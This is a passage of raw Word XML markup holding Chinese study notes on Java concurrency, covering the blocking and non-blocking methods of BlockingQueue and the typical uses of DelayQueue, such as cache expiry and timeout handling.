    <w:p w:rsidR="00105F17" w:rsidRPr="00105F17" w:rsidRDefault="00105F17" w:rsidP="00105F17">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">offer(e) poll() peek() </w:t>
      </w:r>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>方法即不会阻塞线程，也不会抛出异常。例如：当队列被元素填满后，再调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>offer(e)</w:t>
      </w:r>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，则不会插入元素，函数返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105F17" w:rsidRPr="00105F17" w:rsidRDefault="001D7E16" w:rsidP="00105F17">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D7E16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>一般如果是</w:t>
      </w:r>
      <w:r w:rsidRPr="001D7E16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001D7E16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidR="00105F17" w:rsidRPr="001D7E16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>要想要实现阻塞功能，需要调用</w:t>
      </w:r>
      <w:r w:rsidR="00105F17" w:rsidRPr="001D7E16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">put(e) take() </w:t>
      </w:r>
      <w:r w:rsidR="00105F17" w:rsidRPr="001D7E16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>方法。当不满足约束条件时，会阻塞线程</w:t>
      </w:r>
      <w:r w:rsidR="00105F17" w:rsidRPr="00105F17">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F6EB6" w:rsidRDefault="00DA54D7" w:rsidP="00F32669">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId191" w:history="1">
        <w:r w:rsidR="001D7E16" w:rsidRPr="008452B0">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:kern w:val="0"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>http://hellosure.iteye.com/blog/1126541#</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001D7E16" w:rsidRPr="004C243D" w:rsidRDefault="001D7E16" w:rsidP="001D7E16">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r w:rsidR="003F4C25">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>延迟队列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DelayQueue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C56F07" w:rsidRPr="001B6ED1" w:rsidRDefault="00C56F07" w:rsidP="00C56F07">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>延迟队列</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>DelayQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的主要</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>应用场景</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C56F07" w:rsidRPr="001708DF" w:rsidRDefault="00C56F07" w:rsidP="00C56F07">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001708DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">a) </w:t>
      </w:r>
      <w:r w:rsidRPr="001708DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>关闭空闲连接。服务器中，有很多客户端的连接，空闲一段时间之后需要关闭之。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C56F07" w:rsidRPr="001708DF" w:rsidRDefault="00C56F07" w:rsidP="00C56F07">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001708DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:r w:rsidRPr="001708DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>缓存。缓存中的对象，超过了空闲时间，需要从缓存中移出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C56F07" w:rsidRPr="001708DF" w:rsidRDefault="00C56F07" w:rsidP="00C56F07">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001708DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">c) </w:t>
      </w:r>
      <w:r w:rsidRPr="001708DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>任务超时处理。在网络协议滑动窗口请求应答式交互时，处理超时未响应的请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00653004" w:rsidRPr="001708DF" w:rsidRDefault="00653004" w:rsidP="00C56F07">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001708DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>d)</w:t>
      </w:r>
      <w:r w:rsidRPr="001708DF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001708DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>任务中有哪些到了执行时间，该进行调度了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6ED1" w:rsidRPr="001B6ED1" w:rsidRDefault="001B6ED1" w:rsidP="001B6ED1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLine="380"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>一种笨笨的办法就是，使用一个后台线程，遍历所有对象，挨个检查。这种笨笨的办法简单好用，但是对象数量过多时，可能存在性能问题，检查间隔时间不好设置，间隔时间过大，影响精确度，多小则存在效率问题。而且做不到按超时的时间顺序处理。</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6ED1" w:rsidRPr="001B6ED1" w:rsidRDefault="001B6ED1" w:rsidP="001B6ED1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLine="380"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>这场景，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>DelayQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>最适合了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6ED1" w:rsidRPr="001B6ED1" w:rsidRDefault="001B6ED1" w:rsidP="001B6ED1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLine="380"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>DelayQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>java.util.concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中提供的一个很有意思的类。很巧妙，非常棒！但是</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>java doc</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Java SE 5.0</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中都没有提供</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。我最初在阅读</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ScheduledThreadPoolExecutor</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>源码时，发现</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>DelayQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的妙用。随后在实际工作中，应用在</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>超时管理，网络应答通讯协议的请求超时处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6ED1" w:rsidRPr="001B6ED1" w:rsidRDefault="001B6ED1" w:rsidP="001B6ED1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLine="380"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>本文将会对</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>DelayQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>做一个介绍，然后列举应用场景。并且提供一个</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6ED1">
